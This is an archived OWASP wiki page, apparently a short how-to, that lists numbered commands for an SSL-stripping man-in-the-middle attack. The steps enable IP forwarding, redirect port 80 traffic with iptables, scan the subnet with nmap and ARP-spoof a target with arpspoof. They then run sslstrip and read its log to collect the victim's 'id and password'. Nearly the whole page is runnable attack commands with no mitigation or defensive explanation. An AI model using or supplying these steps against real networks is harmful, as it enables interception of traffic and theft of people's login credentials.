This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

SSL Strip

From OWASP
Jump to: navigation, search

Working in Kali linux And Backtrack Operating Systems

step1 : ifconfig

step2: echo 1 > /proc/sys/net/ipv4/ip_forward

step3: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

finding gateway

==

step4: route -n 

finding target ip
==

step5: nmap -sS -O gateway ip/24

step6: arpspoof -i <wlan0> -t target ip -r gateway ip

sslstrip running in new console

===========

step7: sslstrip -l 8080

after target enter the id and password.. we get new console

=================================

step8: cat sslstrip.log

Retrieved from "https://wiki.owasp.org/index.php?title=SSL_Strip&oldid=192133"